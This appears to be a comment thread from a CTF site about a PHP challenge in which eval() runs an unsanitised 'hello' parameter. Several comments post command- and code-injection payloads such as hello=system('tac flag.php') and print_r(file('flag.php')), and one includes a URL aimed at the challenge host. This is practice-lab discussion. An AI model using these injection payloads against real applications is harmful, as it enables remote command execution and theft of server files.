把file函数带进去eval中,以PHP执行
直接在评论里发flag,年轻人不讲武德?
@harry 看到管理员三个字,熠熠生辉。
动态flag他们发了也没事
直接用?hello=file('flag.php'),var_dump()函数可以打印
厉害!
大佬大佬
牛逼!
http://114.67.246.176:10183/?hello=system('tac flag.php')
原理是什么啊???想了解一下
题目内容:<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 可以使用hello=system('tac flag.php')或者?hello=10/print_r(file("flag.ph
为啥用cat不行呢?
看不懂,求解,大佬
大道至简,直接当作一句话利用即可 hello=system('tac flag.php')
@dsadscxzewq cat是可以的,只不过在源代码里查看
F12查看源代码,且根据题目描述可以得知flag在flag.php文件中,且在源代码中发现hello并未赋值,因此只需在原有的url后添加 /?hello=10/print_r(file("flag.php")) ,刷新网页,找到flag。
感谢
Too young Too simple
我的金币不太允许了呀。。。
可以创个小号做后面的题人?
直接读文件吧
...
评论
safemaker2021 3年前
举报
把file函数带进去eval中,以PHP执行
Easyoung 3年前
举报
直接在评论里发flag,年轻人不讲武德?
sn1p3r 3年前
举报
@harry 看到管理员三个字,熠熠生辉。
harry 管理员 3年前
举报
动态flag他们发了也没事
xiao 3年前
举报
直接用?hello=file('flag.php'),var_dump()函数可以打印
wyx48046 3年前
举报
厉害!
Hiiro 3年前
举报
大佬大佬
test_ctf 3年前
举报
牛逼!
Hacker23 3年前
举报
http://114.67.246.176:10183/?hello=system('tac flag.php')
ZTyyds 2年前
举报
原理是什么啊???想了解一下
guoguo 3年前
举报
题目内容:<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 可以使用hello=system('tac flag.php')或者?hello=10/print_r(file("flag.ph
dsadscxzewq 3年前
举报
为啥用cat不行呢?
痕夕 3年前
举报
看不懂,求解,大佬
SwBack 3年前
举报
大道至简,直接当作一句话利用即可 hello=system('tac flag.php')
巨人肩膀上的矮子 2年前
举报
@dsadscxzewq cat是可以的,只不过在源代码里查看
dsadscxzewq 3年前
举报
为啥用cat不行呢?
BBBugku 3年前
举报
F12查看源代码,且根据题目描述可以得知flag在flag.php文件中,且在源代码中发现hello并未赋值,因此只需在原有的url后添加 /?hello=10/print_r(file("flag.php")) ,刷新网页,找到flag。
krystalll 3年前
举报
感谢
lurnco 3年前
举报
Too young Too simple
Discuze奇 3年前
举报
我的金币不太允许了呀。。。
lurnco 3年前
举报
可以创个小号做后面的题人?
1amer 3年前
举报
直接读文件吧